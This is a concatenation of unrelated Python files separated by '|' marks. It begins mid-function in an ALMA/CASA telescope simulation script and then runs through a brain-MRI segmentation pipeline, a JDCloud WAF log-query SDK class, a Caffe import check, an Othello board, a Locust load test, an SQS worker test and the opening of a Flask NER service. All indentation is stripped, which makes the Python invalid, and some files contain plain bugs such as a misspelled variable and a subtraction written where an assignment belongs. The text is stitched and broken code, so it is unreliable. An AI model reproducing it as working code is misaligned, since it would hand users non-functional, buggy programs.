if dec <= -10:
decString="J2000 10h00m00s %3dd00m00s"%(dec)
elif dec<0 and dec>-10:
decString="J2000 10h00m00s -0%1dd00m00s"%(-dec)
elif dec>=0 and dec < 10 :
decString="J2000 10h00m00s +0%1dd00m00s"%(dec)
elif dec >=10:
decString="J2000 10h00m00s +%2dd00m00s"%(dec)
# simulayion with one arcsec component
##os.system("rm -Rf *%s*"%(projectName))
print decString
index=0
print resolutionArr
for res in resolutionArr:
resolutionDisk = "%4.2farcsec"%(res/100.)
print resolutionDisk
print antennaCfg
so.sim_observe(
project = projectName+"%d"%(index),
skymodel = 'disk100.fits',
inbright = '1Jy/pixel',
indirection = decString ,
incell = resolutionDisk,
incenter = frequency,
inwidth = '8GHz',
antennalist = antennaCfg,
totaltime = trackDuration,
integration = '10s',
direction = decString,
maptype = 'ALMA',
# mapsize = ['2arcmin','2arcmin'],
# pointingspacing = "2arcmin"
)
sa.sim_analyze(
project=projectName+"%d"%(index),
image = True ,
imsize = imageTotalSize,
# cell = cellsize,
mask = maskClean,
niter = 2000,
threshold = '0.1mJy',
graphics = 'file'
)
imageName=projectName+"%d/"%(index)+projectName+"%d.%s.image"%(index,antennaCfg.split('.')[0])
# imageName=projectName+"%d/"%(index)+projectName+"%d.image"%(index)
print "Read %s"%(imageName)
ia.open(imageName)
# flux0=ia.statistics()['flux'][0]
stat = ims.imstat(
imagename = imageName,
box = boxStat ,
)
flux0 = stat['flux'][0]
print flux0
if res == resolutionArr[0]:
fluxNormalization = flux0
fluxRes = flux0/fluxNormalization
print "Flux: %4.3f"%(fluxRes)
flux[index] = fluxRes
ia.close()
index += 1
return(resolutionArr,flux)
class beam:
"""
Class to analyze the properties of the beam
"""
def __init__(self):
pass
def curveBeamResolutiongDeclination(self,antennaCfg,trackDuration,declinationMin,declinationMax,decStep, ha = 'transit'):
"""
Compute the minor,Major axis vs. Declination for a given configuration
antennaCfg: antenna configuration
trackDuration: time duration, e.g. "6h"
declinationMin,declinationMax: range of declination
decStep: step for the declination, needs to be an integer...
Output : arrays [declination] [minor] [major]
"""
projectName="tempCurveBeamDeclination"
nStep=math.floor((declinationMax-declinationMin)/decStep)
decArr=np.arange(nStep)*decStep+declinationMin
minorAxis = np.zeros(nStep)
majorAxis = np.zeros(nStep)
las100 = np.zeros(nStep)
index=0
# simulation with one arcsec component. We clean the old files.
os.system("rm -Rf *%s*"%(projectName))
for dec in decArr:
if dec <= -10:
decString="J2000 0h00m00s %3dd00m00s"%(dec)
elif dec<0 and dec>-10:
decString="J2000 0h00m00s -0%1dd00m00s"%(-dec)
elif dec>=0 and dec < 10 :
decString="J2000 0h00m00s +0%1dd00m00s"%(dec)
elif dec >=10:
decString="J2000 0h00m00s +%2dd00m00s"%(dec)
# simulayion with one arcsec component
#os.system("rm -Rf *%s*"%(projectName))
print decString
#cl.done()
cl.addcomponent(dir=decString, flux=1,freq='100GHz',shape="Gaussian",majoraxis="0.1arcsec",minoraxis="0.1arcsec",positionangle="0deg")
cl.rename(projectName+"%d.cl"%(index))
cl.done()
print projectName+"%d.cl"%(index)
so.simobserve(
project=projectName+"%d"%(index),
complist=projectName+"%d.cl"%(index),
compwidth = '8GHz',
antennalist=antennaCfg,
totaltime=trackDuration,
integration = '10s',
hourangle = 'ha'
)
sa.simanalyze(
project=projectName+"%d"%(index),
image = True ,
weighting = 'briggs',
# imsize = 256,
# cell = cellsize,
# mask = maskClean,
niter = 100,
# threshold = '0.1mJy',
# graphics = 'file'
)
psfName= projectName+"%d/"%(index)+projectName+"%d.%s.psf"%(index,antennaCfg.split('.')[0])
psfQuickName = projectName+"%d/"%(index)+projectName+"%d.%s.quick.psf"%(index,antennaCfg.split('.')[0])
msName = projectName+"%d/"%(index)+projectName+"%d.%s.ms"%(index,antennaCfg.split('.')[0])
imageName = projectName+"%d/"%(index)+projectName+"%d.%s.noisy.image"%(index,antennaCfg.split('.')[0])
# if os.path.exists(psfName):
# psfRes = psf.psf_calc(psfName)
# else:
# psfRes = psf.psf_calc(psfQuickName)
ia.open(imageName)
data = ia.restoringbeam()
ia.close()
print data
minorAxis[index] = data['minor']['value']
majorAxis[index] = data['major']['value']
print "minor Axis:",minorAxis[index]
print "major Axis:",majorAxis[index]
ms = uvw.UVW(msName)
dUV = ms.distUV(noShadow = True)
duvMin = min(dUV)
rds = np.sort(dUV)
nuv = len(rds)
i05 = (int)(0.05 * nuv)
L05 = rds[i05]
las = RAD2ARCSEC * 0.0017987547479999 / duvMin ## 0.6 * Lambda / BL_min
## Definition of LAS from SCIREQ-328
las100[index] = RAD2ARCSEC * 0.983296 * 0.0029979245799998332 / L05
# if las100[index] > las :
# las100[index] = las
# las100[index] = las
print "mininum BL:",duvMin
print "L05:",L05
print "LAS (old definition)",las
print "LAS (100 GHz):",las100[index]
index+=1
# fout=open("curveBeamDec.last","wb")
# data={'Dec':decArr,'Shadow':fractionShadowing}
# pickle.dump(data,fout)
# fout.close()
return(decArr,minorAxis,majorAxis,las100)
class UVcoverage:
"""
Class to produce the UVcoverage plots and the derived densities, to provide
"""
def __init__(self):
pass
def radialDensityArrayConfigurations(self,arrayNameList,totalTimeList,Rmin,Rmax,Nbin,dec):
"""
Return the radial UV-density for different arrays with a total time of integration for each array
INPUT:
arrayNameList : list of the array to be analyzed.
totalTimeList:List of total time of integration for each array
Rmin,Rmax,Nbin: minimum, maximum, bin number for the radius. (common)
dec: Declination of the source.
"""
if dec <= -10:
decString="J2000 0h00m00s %3dd00m00s"%(dec)
elif dec<0 and dec>-10:
decString="J2000 0h00m00s -0%1dd00m00s"%(-dec)
elif dec>=0 and dec < 10 :
decString="J2000 0h00m00s +0%1dd00m00s"%(dec)
elif dec >=10:
decString="J2000 0h00m00s +%2dd00m00s"%(dec)
projectName = "tempUVcoverage"
os.system("rm -Rf *%s*"%(projectName))
cl.addcomponent(dir=decString, flux=1.,freq='100GHz',shape="Gaussian",majoraxis="10arcsec",minoraxis="10arcsec",positionangle="0deg")
cl.rename(projectName+".cl")
cl.done()
indexTime = 0
dens = []
for arrayName in arrayNameList:
print "Configuration: %s \n"%(arrayName)
trackDuration = totalTimeList[indexTime]
so.simobserve(
project = projectName,
complist = projectName+".cl",
compwidth = '8GHz',
antennalist = arrayName,
totaltime = trackDuration,
integration = '10s',
)
msName=projectName+"/"+projectName+".%s.ms"%(arrayName.split('.')[0])
uv = uvw.UVW(msName)
rad, rhouv = uv.radialDensity(Rmin,Rmax,Nbin)
dens.append(rhouv)
indexTime += 1
return (rad, dens)
class targetSimulation:
"""
Class to provide image of a real object seen with the current Array Configuration
"""
def __init__(self):
self.source = 0.
def buildImageWithComponentList(self,nameComp,resolutionList,maxSize,xyStep,sh='Gaussian',fluxList=[]):
""" Input List:
minRes,maxRes : minimum,maximum of the components
nComp : number of components
"""
RAString="J2000 0h00m"
DecString="-30d00m"
xStep = 30.-maxSize/2.
yStep = 30.+maxSize/2.
dStep = xyStep
if len(fluxList) != len(resolutionList):
fluxList=np.zeros(len(resoltuionList),np.int)
fluxList[:]=1.
indexSource=0
for resolution in resolutionList:
xStep+=dStep
if xStep > 30.+maxSize/2.:
xStep=30.-maxSize/2.
yStep-=dStep
fluxSource=fluxList[indexSource]
indexSource+=1
posString="%s0%3.1fs"%(RAString,xStep/15.)+" %s%3.1fs"%(DecString,yStep)
print posString, "%5.2farcsec resolution"%(resolution)
cl.addcomponent(dir=posString, flux=fluxSource,freq='100GHz',shape=sh,majoraxis="%5.2farcsec"%(resolution),minoraxis="%5.2farcsec"%(resolution),positionangle="0deg")
cl.rename(nameComp)
cl.done()
class LAS:
"""
Class to study the LAS for a given configuration
"""
def __init__(self):
pass
def curveFluxDiskSize(self,antennaCfg, trackDuration, sizeMin, sizeMax, sizeStep, declination, cellsize = '0.2arcsec',
hourAngle='transit', shapeCL = 'Gaussian', threshClean = '0mJy'):
"""
Compute the flux of disk with different size
antennaCfg: antenna configuration
trackDuration: time duration, e.g. "6h"
sizeMin,sizeMax: range of the disk size in arcsec. The total flux is 1 Jy
sizeStep: step for the disk size
declination: disk declination
cellsize : size of the cell
Output: array [sizeDisk, flux]
"""
## setting simobserve
projectName="tempDiskFlux"
nStep = int((sizeMax-sizeMin) / sizeStep)
sizeArr = np.arange(nStep)*sizeStep + sizeMin
flux = np.zeros(nStep)
size = np.zeros(nStep)
las100 = np.zeros(nStep)
totalSize = 120.
mapSize = "%3.1farcsec"%(totalSize)
cellF = float(cellsize[:-6]) ## to be improved ....
imagesize = int(totalSize/cellF)
index=0
print "image size: %d "%(imagesize)
print "mapsize :%s"%(mapSize)
# simulation with one arcsec component. We clean the old files.
os.system("rm -Rf *%s*"%(projectName))
if declination <= -10:
decString="J2000 0h00m00s %3dd00m00s"%(declination)
raDisk = "0h00m00s"
decDisk = "%3dd00m00s"%(declination)
elif declination < 0 and dec>-10:
decString="J2000 0h00m00s -0%1dd00m00s"%(-declination)
raDisk = "0h00m00s"
decDisk = "-0%1d00m00s"%(declination)
elif declination >=0 and dec < 10 :
decString="J2000 0h00m00s +0%1dd00m00s"%(declination)
raDisk = "0h00m00s"
decDisk = "+0%1d00m00s"%(declination)
elif declination >=10:
decString="J2000 0h00m00s +%2dd00m00s"%(declination)
raDisk = "0h00m00s"
decDisk = "+0%2d00m00s"%(declination)
## Estimation of the spatial resolution at 100 GHz for the mask
arrCfg = aT.ArrayInfo(antennaCfg)
arrCfg.stats()
maxBL = arrCfg.maxBl
resEstimated = 61800. / (maxBL * 100.)
print("Estimated RES: %3.2f"%(resEstimated))
for disksize in sizeArr :
#cl.done()
cl.addcomponent(dir=decString, flux=1. , freq='100GHz',shape= shapeCL,majoraxis= "%2.2farcsec"%(disksize),minoraxis="%2.2farcsec"%(disksize),positionangle="0deg")
cl.rename(projectName+"%d.cl"%(index))
cl.done()
print projectName+"%d.cl"%(index)
so.simobserve(
project = projectName+"%d"%(index),
complist = projectName+"%d.cl"%(index),
compwidth = '8GHz',
antennalist = antennaCfg,
totaltime = trackDuration,
integration = '10s',
mapsize = mapSize ,
user_pwv = 0. ,
)
maxDisk = max(disksize, resEstimated )
regDiskClean = 'circle[[%s , %s], %3.1farcsec ]'%(raDisk,decDisk, maxDisk * 1.5)
regDiskFlux = 'circle[[%s , %s], %3.1farcsec ]'%(raDisk,decDisk, maxDisk * 1.5)
sa.simanalyze(
project=projectName+"%d"%(index),
image = True ,
weighting = 'briggs',
imsize = imagesize,
cell = cellsize,
mask = regDiskClean,
niter = 2000,
threshold = threshClean,
imdirection = decString ,
# graphics = 'file'
)
msName = projectName+"%d/"%(index)+projectName+"%d.%s.ms"%(index,antennaCfg.split('.')[0])
imageName = projectName+"%d/"%(index)+projectName+"%d.%s.noisy.image"%(index,antennaCfg.split('.')[0])
print(" ")
print("## analysis ...")
print "Mask Clean :: %s"%(regDiskClean)
print "Mask Flux :: %s"%(regDiskFlux)
print "Component Size :: %2.2f"%(disksize)
ia.open(imageName)
data = ia.restoringbeam()
bmaj = data['major']['value']
stat = ia.statistics (region = regDiskFlux)
flux[index] = stat['flux']
ia.close()
print data
ms = uvw.UVW(msName)
dUV = ms.distUV(noShadow = True)
duvMin = min(dUV)
las100[index] = RAD2ARCSEC * 0.0017987547479999 / duvMin ## 0.6 * Lambda / BL_min
print "mininum BL:",duvMin
print "LAS (100 GHz & min BL):",las100[index]
print "Flux: %2.3f"%(flux[index])
print "--"
index+=1
return([sizeArr,flux])
class Shadowing:
"""
Class for computing shadowing properties
"""
def __init__(self):
pass
def curveShadowingDeclination(self,antennaCfg,trackDuration,declinationMin,declinationMax,decStep,hourAngle = 'transit'):
"""
Compute the shadowing fraction vs. Declination for a given configuration
antennaCfg: antenna configuration
trackDuration: time duration, e.g. "6h"
declinationMin,declinationMax: range of declination
decStep: step for the declination, needs to be an integer...
Output : array [declination,fraction of shadowing]
"""
projectName="tempCurveShadowingDeclination"
nStep=math.floor((declinationMax-declinationMin)/decStep)
decArr=np.arange(nStep)*decStep+declinationMin
fractionShadowing=np.zeros(nStep)
index=0
# simulayion with one arcsec component. We clean the old files.
os.system("rm -Rf *%s*"%(projectName))
for dec in decArr:
if dec <= -10:
decString="J2000 0h00m00s %3dd00m00s"%(dec)
elif dec<0 and dec>-10:
decString="J2000 0h00m00s -0%1dd00m00s"%(-dec)
elif dec>=0 and dec < 10 :
decString="J2000 0h00m00s +0%1dd00m00s"%(dec)
elif dec >=10:
decString="J2000 0h00m00s +%2dd00m00s"%(dec)
# simulayion with one arcsec component
##os.system("rm -Rf *%s*"%(projectName))
print decString
#cl.done()
cl.addcomponent(dir=decString, flux=1,freq='100GHz',shape="Gaussian",majoraxis="10arcsec",minoraxis="10arcsec",positionangle="0deg")
cl.rename(projectName+"%d.cl"%(index))
cl.done()
print projectName+"%d.cl"%(index)
# sim.simdata(
so.simobserve(
project=projectName+"%d"%(index),
complist=projectName+"%d.cl"%(index),
compwidth = '8GHz',
antennalist=antennaCfg,
totaltime=trackDuration,
integration = '10s',
# image = False ,
hourangle = hourAngle,
# imsize = 256,
# cell = '0.5arcsec',
#graphics = 'none'
)
print "Read %s%d.ms"%(projectName,index)
antList=string.split(antennaCfg,'.')
msName=projectName+"%d/"%(index)+projectName+"%d.%s.ms"%(index,antList[0])
print msName
vis=uvw.UVW(msName)
ii,shad=vis.shadowing()
fractionShadowing[index]=shad
print "Shadowing fraction: %2.2f"%(shad)
index+=1
fout=open("curveShadowingDec.last","wb")
data={'Dec':decArr,'Shadow':fractionShadowing}
pickle.dump(data,fout)
fout.close()
return(decArr,fractionShadowing)
def plotShadowingDeclination(self,declination,shadowing):
"Plot the shadowing fraction vs. the declination"
pl.clf()
pl.plot(declination,shadowing)
pl.plot(declination,shadowing,'o')
pl.xlabel("Declination (Degree)")
pl.ylabel("Shadowing (%)")
pl.savefig("Shadowing-Declination.png")
pl.show()
class figures:
"""
Class to produce different plots
"""
def __init__(self):
pass
def arrayConfig(self,fileCfg,xmin,xmax,ymin,ymax,title="",auto=False,savefig = None):
"""
fileCfg: configuration file for the Array
xmin,xmax,ymin,ymax: plot ranges
title: title in the plot
"""
xx=[]
yy=[]
zz=[]
name=[]
f=open(fileCfg)
dump=f.readline()
res=dump.split()
while dump !="":
if res[0] != "#":
xx.append(res[0])
yy.append(res[1])
zz.append(res[2])
name.append(res[4])
dump=f.readline()
res=dump.split()
print res
f.close()
xa=np.array(xx,np.float)
ya=np.array(yy,np.float)
xmean=xa.mean()
ymean=ya.mean()
xa-=xmean
ya-=ymean
if auto :
xmin = 1.1 * min(xa)
xmax = 1.1 * max(xa)
ymin = 1.1 * min(ya)
ymax = 1.1 * max(ya)
pl.clf()
pl.plot(xa,ya,"ro")
pl.xlabel("X (meter)")
pl.ylabel("Y (meter)")
pl.xlim(xmin,xmax)
pl.ylim(ymin,ymax)
index=0
for ant in name:
pl.text(xa[index],ya[index],ant)
index+=1
pl.text(xmin*0.9,ymax*0.9,title)
pl.show()
class report:
"""
Meta-class to create all the plots and reports.
"""
def __init__(self,directoryFile,reportType):
self.directoryFile=directoryFile
self.reportType-reportType
self.band={'3':'100GHz','6':'230GHz','7':'345GHz','9':'675GHz'}
def create(self,filename):
"""
Create the report,text+plots+simuls, according to the reportType
filename : Antenna Configuration file
"""
pass
########################Main program####################################
if __name__=="__main__":
" main program"
a=Shadowing()
dec,shad=a.curveShadowingDeclination('C32-cpt.cfg','2h',-75,25,2)
a.plotShadowingDeclination(dec,shad)
out=open("shadowingDec-2h.pickle","wb")
data={'dec':dec,'shad':shad}
pickle.dump(data,out)
out.close()
#f=figures()
#f.arrayConfig("Pads.cfg",-1000,1000,-1000,1000)
#f.arrayConfig("extendedCycle0.cfg",-210,270,-240,240)
|
import os
import sys
sys.path.append('..')
from glob import glob
from DeepBrainSeg.registration import Coregistration
from DeepBrainSeg.helpers.dcm2niftii import convertDcm2nifti
from DeepBrainSeg.brainmask.hdbetmask import get_bet_mask
from DeepBrainSeg.tumor import tumorSeg
coreg = Coregistration()
segmentor = tumorSeg()
dcm_subject_root = '../sample_volume/dcm/all_patients'
dcm_subjects = [os.path.join(dcm_subject_root, sub) for sub in os.listdir(dcm_subject_root)]
for subject in dcm_subjects:
seqs = os.listdir(subject)
json = {}
for seq in seqs:
if seq.__contains__('sT1W_FS 3D_ISO_COR'):
json['t1c'] = os.path.join(subject, seq)
elif seq.__contains__('T2W_FLAIR_TRA'):
json['flair'] = os.path.join(subject, seq)
elif seq.__contains__('VT1W_3D_FFE'):
json['t1'] = os.path.join(subject, seq)
elif seq.__contains__('T2W_TSE_TRA'):
json['t2'] = os.path.join(subject, seq)
# convert dcm to nifty
convertDcm2nifti(path_json = json,
output_dir = os.path.join('../sample_results/nifty/', subject.split('/').pop()),
verbose = True)
# HD-BET mask extraction
for key in json.keys():
get_bet_mask(os.path.join('../sample_results/nifty/', subject.split('/').pop(), key+'.nii.gz'),
os.path.join('../sample_results/skull_strip/{}/'.format(subject.split('/').pop())),
device = 'cpu')
# Coregistration
moving_imgs = {'t1': os.path.join('../sample_results/skull_strip/{}/{}.nii.gz'.format(subject.split('/').pop(), 't1')),
't2': os.path.join('../sample_results/skull_strip/{}/{}.nii.gz'.format(subject.split('/').pop(), 't2')),
'flair':os.path.join('../sample_results/skull_strip/{}/{}.nii.gz'.format(subject.split('/').pop(), 'flair'))
}
fixed_img = os.path.join('../sample_results/skull_strip/{}/{}.nii.gz'.format(subject.split('/').pop(), 't1c'))
coreg.register_patient(moving_images = moving_imgs,
fixed_image = fixed_img,
save_path = os.path.join('../sample_results/coreg/{}'.format(subject.split('/').pop())))
# Segmentation
segmentor.get_segmentation(os.path.join('../sample_results/coreg/{}/isotropic/t1.nii.gz'.format(subject.split('/').pop())),
os.path.join('../sample_results/coreg/{}/isotropic/t2.nii.gz'.format(subject.split('/').pop())),
os.path.join('../sample_results/coreg/{}/isotropic/t1c.nii.gz'.format(subject.split('/').pop())),
os.path.join('../sample_results/coreg/{}/isotropic/flair.nii.gz'.format(subject.split('/').pop())),
os.path.join('../sample_results/segmentations/{}/'.format(subject.split('/').pop())))
|
"""
bottle:
Lightweight Python web framework - http://bottlepy.org/docs/dev/
recorder:
Module for manipulating records of hours worked
Record
Object that simulates a single record of work done
RecordMalFormedException
Wrapped exception used and required, internally, by the Record class
crypto:
Module for passing encrypted data to a remote logging server
labeler:
Module for consistently labeling HTML elements as they pertain to modeling records
color_printer:
Module for printing in color within Python
""" |
# coding=utf8
# Copyright 2018 JDCLOUD.COM
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# NOTE: This class is auto generated by the jdcloud code generator program.
from jdcloud_sdk.core.jdcloudrequest import JDCloudRequest
class WafQueryAttackDetailsRequest(JDCloudRequest):
"""
查询攻击记录详情
"""
def __init__(self, parameters, header=None, version="v1"):
super(WafQueryAttackDetailsRequest, self).__init__(
'/wafAttackDetails', 'POST', header, version)
self.parameters = parameters
class WafQueryAttackDetailsParameters(object):
def __init__(self, ):
"""
"""
self.startTime = None
self.endTime = None
self.domain = None
self.sortField = None
self.sortRule = None
self.pageNumber = None
self.pageSize = None
def setStartTime(self, startTime):
"""
:param startTime: (Optional) 查询起始时间,UTC时间,格式为:yyyy-MM-dd'T'HH:mm:ss'Z',示例:2018-10-21T10:00:00Z
"""
self.startTime = startTime
def setEndTime(self, endTime):
"""
:param endTime: (Optional) 查询截止时间,UTC时间,格式为:yyyy-MM-dd'T'HH:mm:ss'Z',示例:2018-10-21T10:00:00Z
"""
self.endTime = endTime
def setDomain(self, domain):
"""
:param domain: (Optional) 需要查询的域名, 必须为用户pin下有权限的域名
"""
self.domain = domain
def setSortField(self, sortField):
"""
:param sortField: (Optional) 排序字段
"""
self.sortField = sortField
def setSortRule(self, sortRule):
"""
:param sortRule: (Optional) 排序规则:desc,asc
"""
self.sortRule = sortRule
def setPageNumber(self, pageNumber):
"""
:param pageNumber: (Optional) 页码,从1开始
"""
self.pageNumber = pageNumber
def setPageSize(self, pageSize):
"""
:param pageSize: (Optional) 页大小,默认20
"""
self.pageSize = pageSize
|
# -*- coding: utf-8 -*-
'''
python2 hello-caffe.py
---or---
python3 hello-caffe.py
'''
from __future__ import print_function
import os, sys
def hello_world():
import caffe
print('pycaffe version: {}'.format(caffe.__version__))
def insert_syspath(p):
if is_path_exist(p):
print('insert {} into sys path'.format(p))
sys.path.insert(0, p)
return True
return False
def get_python_version():
''' return version string of python '''
py_ver = ".".join(map(str, sys.version_info[:2]))
return py_ver
def is_path_exist(p):
return os.path.exists(p)
def init():
env_caffe_root = os.environ.get('CAFFE_ROOT')
if not env_caffe_root:
print('no CAFFE_ROOT')
return False
pycaffe_path = '{}/python'.format(env_caffe_root)
if insert_syspath(pycaffe_path):
print('insert syspath successfully'.format(pycaffe_path))
return True
#print('maybe {} not found?'.format(pycaffe_path))
home_path = os.environ['HOME']
#try_path = 'src/caffe-try'
intel_path = 'src/github/intel/caffe'
pycaffe_path = '{}/{}/python'.format(home_path,intel_path)
if insert_syspath(pycaffe_path):
print('2nd try insert syspath successfully'.format(pycaffe_path))
return True
return False
def main():
if init():
print('import pycaffe successfully')
else:
print('failed to import pycaffe...')
return
print('Would you like to call caffe function? will core dump a lot')
ans = 'no'
ver = float(get_python_version())
#print('ver: ', get_python_version())
if ver > 3.0:
ans = input('enter "yes" to continue: ')
else:
ans = raw_input('enter "yes" to continue: ')
if ans == 'yes':
hello_world()
if __name__ == '__main__':
main()
|
from enum import Enum, unique
import copy
@unique
class Dirn(Enum):
UP = (-1, 0)
DOWN = (1, 0)
LEFT = (0, -1)
RIGHT = (0, 1)
UPL = (-1, -1)
DOWNR = (1, 1)
UPR = (-1, 1)
DOWNL = (1, -1)
@classmethod
def values(cls):
return [cls.UP, cls.DOWN, cls.LEFT, cls.RIGHT,
cls.UPL, cls.DOWNR, cls.UPR, cls.DOWNL]
@unique
class Shade(Enum):
DARK = "D"
LIGHT = "L"
@classmethod
def values(cls):
return [cls.DARK, cls.LIGHT]
def opposite(self):
return Shade.DARK if self is Shade.LIGHT else Shade.LIGHT
class Disk:
def __init__(self, row, col, shade):
self.row, self.col = row, col
self.shade = shade
self.flank_pairs = []
def __str__(self):
return self.shade.value
def flip(self):
self.shade = self.shade.opposite()
class Cell:
def __init__(self, row, col):
self.row, self.col = row, col
self.disk = None
def __str__(self):
mark = self.disk.__str__() if self.disk is not None else " "
return "|" + mark + "|"
def put(self, disk):
if disk is not None:
self.disk = disk
def empty(self):
return self.disk is None
class Board:
SIZE = 8
HEADER = "------------------------"
def __init__(self):
self.cells = [[Cell(row, col) for col in range(Board.SIZE)]
for row in range(Board.SIZE)]
self.cells[3][3].put(Disk(3, 3, Shade.DARK))
self.cells[3][4].put(Disk(3, 4, Shade.LIGHT))
self.cells[4][3].put(Disk(4, 3, Shade.LIGHT))
self.cells[4][4].put(Disk(4, 4, Shade.DARK))
self.ddisks = [self.cells[3][3].disk, self.cells[4][4].disk]
self.ldisks = [self.cells[3][4].disk, self.cells[4][3].disk]
self.spaces = Board.SIZE ** 2 - 4
@staticmethod
def in_bounds(row, col):
return (row >= 0 and row < Board.SIZE) and (col >= 0 and col < Board.SIZE)
@staticmethod
def sameas(row1, col1, row2, col2):
return (row1 == row2) and (col1 == col2)
def draw(self):
print(Board.HEADER)
for row in range(Board.SIZE):
for col in range(Board.SIZE):
print(self.cells[row][col].__str__(), end="")
print("\n" + Board.HEADER)
def copy_board(self):
board_copy = Board()
board_copy.cells = copy.deepcopy(self.cells)
return board_copy
def in_dlist(self, dlist, row, col):
return any(Board.sameas(row, col, d[0], d[1])
for d in dlist)
def valid_moves(self, shade):
moveset = set()
cdisks = self.ldisks if shade is Shade.LIGHT else self.ddisks
for dirn in Dirn.values():
for cdisk in cdisks:
opp = 0
c_row, c_col = cdisk.row + dirn.value[0], cdisk.col + dirn.value[1]
while (Board.in_bounds(c_row, c_col) and
not self.cells[c_row][c_col].empty() and
self.cells[c_row][c_col].disk.shade is shade.opposite()):
opp += 1
c_row, c_col = c_row + dirn.value[0], c_col + dirn.value[1]
#Only add if loop broken since reached empty cell
if (Board.in_bounds(c_row, c_col) and
self.cells[c_row][c_col].empty() and
opp > 0):
moveset.add((c_row, c_col))
cdisk.flank_pairs.append((c_row, c_col))
return moveset
def capture(self, disk):
cdisks = self.ldisks if disk.shade is Shade.LIGHT else self.ddisks
for cdisk in cdisks:
if (disk.row, disk.col) in cdisk.flank_pairs:
rdf, cdf = cdisk.row - disk.row, cdisk.col - disk.col
if rdf != 0:
rdf = int(rdf / abs(rdf))
if cdf != 0:
cdf = int(cdf / abs(cdf))
c_row, c_col = disk.row + rdf, disk.col + cdf
while (c_row, c_col) != (cdisk.row, cdisk.col):
opp = self.cells[c_row][c_col].disk
if disk.shade is Shade.LIGHT:
self.ldisks.append(opp)
self.ddisks.remove(opp)
else:
self.ddisks.append(opp)
self.ldisks.remove(opp)
opp.flip()
if c_row != cdisk.row:
c_row = c_row + rdf
if c_col != cdisk.col:
c_col = c_col + cdf
cdisk.flank_pairs.remove((disk.row, disk.col))
def update(self, row, col, shade):
self.cells[row][col].put(Disk(row, col, shade))
if shade is Shade.LIGHT:
self.ldisks.append(self.cells[row][col].disk)
else:
self.ddisks.append(self.cells[row][col].disk)
self.spaces -= 1
self.capture(self.cells[row][col].disk)
def winner(self):
lq, dq = len(self.ldisks), len(self.ddisks)
if lq == dq:
return None
return Shade.LIGHT if lq > dq else Shade.DARK
|
import logging
import random
import uuid
import json
from json import JSONDecodeError
from locust import HttpUser, task, between, events
logging.basicConfig(level=logging.INFO)
formIDs = ["28","29","30","31"]
formSubmissions ={
"28":{
"2": "Performance Testing",
"3": "performance.testing@cds-snc.ca",
"4": "Ontario",
"formID": "28"
},
"29":{
"2": "Performance Testing",
"3": "performance.testing@cds-snc.ca",
"4": "Alberta",
"formID": "29"
},
"30":{
"2": "Performance Testing",
"3": "performance.testing@cds-snc.ca",
"4": "New Brunswick",
"formID":"30"
},
"31":{
"2": "Performance Testing",
"3": "performance.testing@cds-snc.ca",
"4": "British Columbia",
"formID": "31"
}
}
class FormUser(HttpUser):
wait_time = between(3,10)
host = "https://forms-staging.cdssandbox.xyz"
formDataSubmissions = {"success":[], "failed":[]}
# Test 1: High hit count
# Hit landing page
# Choose one of the performance testing forms
# Submit Form response based on form ID
@classmethod
def on_test_stop(self):
output_file = open("/tmp/form_completion.json", "w")
json.dump(self.formDataSubmissions, output_file)
output_file.close()
@task
def formFill(self):
lang = random.choice(["en", "fr"])
# Get to welcome page
self.client.get(f"/{lang}/welcome-bienvenue")
# Go to a form page after
formID = random.choice(formIDs)
self.client.get(f"/{lang}/id/{formID}")
uniqueFormData = formSubmissions[formID]
uniqueFormData["2"] = uuid.uuid4().hex
# Submit the form
with self.client.post("/api/submit", json=uniqueFormData, name=f"/api/submit?{formID}", catch_response=True) as response:
try:
if response.json()["received"] != True :
self.formDataSubmissions["failed"].append(uniqueFormData["2"])
response.failure(f"Submission failed for formID {formID}")
else:
self.formDataSubmissions["success"].append(uniqueFormData["2"])
except JSONDecodeError:
self.formDataSubmissions["failed"].append(uniqueFormData["2"])
response.failure("Response could not be decoded as JSON")
except KeyError:
self.formDataSubmissions["failed"].append(uniqueFormData["2"])
response.failure("Response did not have the expected receive key")
# Go to confirmation page
self.client.get(f"/{lang}/id/{formID}/confirmation")
# Admin Users tests:
#
# Test 1: Low hit count
# Login to Admin
# Create form (upload)
# Update form text (id/settings/)
# Delete form (id/settings)
#
# Test 2: Med hit count
# Login to Admin
# Go to Form Templates list (view-templates)
#
# Test 3: Low hit count
# Login to Admin
# Go to Feature Flags
#
# Test 4: High hit count
# Login to Admin
# Retrieve responses for form
#
# Test 5: Hight hit count
# Login to Admin
# Got to dashboard
|
import logging
import os
import sys
import time
import boto3
from datadog import statsd
from sqsworkers.crew import Crew
statsd.namespace = 'dtech.sqs.workers'
statsd.constant_tags.append('sqs-workers-test')
statsd.host = 'statsd.domain.dev.atl-inf.io'
msg_logger = logging.getLogger('message')
msg_logger.setLevel(logging.DEBUG)
std_logger = logging.StreamHandler(sys.stdout)
std_logger.setLevel(logging.DEBUG)
msg_logger.addHandler(std_logger)
app_logger = logging.getLogger('default')
class MsgProcessor():
def __init__(self, msg):
self.msg = msg
msg_logger.error('--------------------')
msg_logger.error('msg processor instantiated')
msg_logger.error('--------------------')
def start(self):
msg_logger.error('--------------------')
msg_logger.error('message body:')
msg_logger.error('"' + self.msg.body + '"')
msg_logger.error('message processed')
msg_logger.error('--------------------')
self.msg.delete()
def test_crew_with_one_worker():
sqs_session = boto3.session.Session(
region_name='us-east-1',
aws_access_key_id=os.environ.get('AWS_ACCESS_KEY_ID'),
aws_secret_access_key=os.environ.get('AWS_SECRET_ACCESS_KEY'),
aws_session_token=os.environ.get('AWS_SESSION_TOKEN')
)
options = {
'sqs_session': sqs_session,
'queue_name': 'hydra-ddev-test-queue',
'MessageProcessor': MsgProcessor,
'logger': msg_logger,
'statsd': statsd,
'sentry': None,
'worker_limit': 1
}
c = Crew(**options)
c.start()
time.sleep(3)
c.stop()
test_crew_with_one_worker()
|
import argparse
import json
import logging
import os
import pdb
import sys
import time
import requests
from flask import Flask, abort, jsonify, make_response, request
from flask_cors import CORS
from memory_profiler import memory_usage, profile
from config import SetupParameters
from transner import Transner
app = Flask(__name__)
cors = CORS(app)
model_dict = {'NERmodel': None}
os.environ["CUDA_DEVICE_ORDER"]="PCI_BUS_ID"
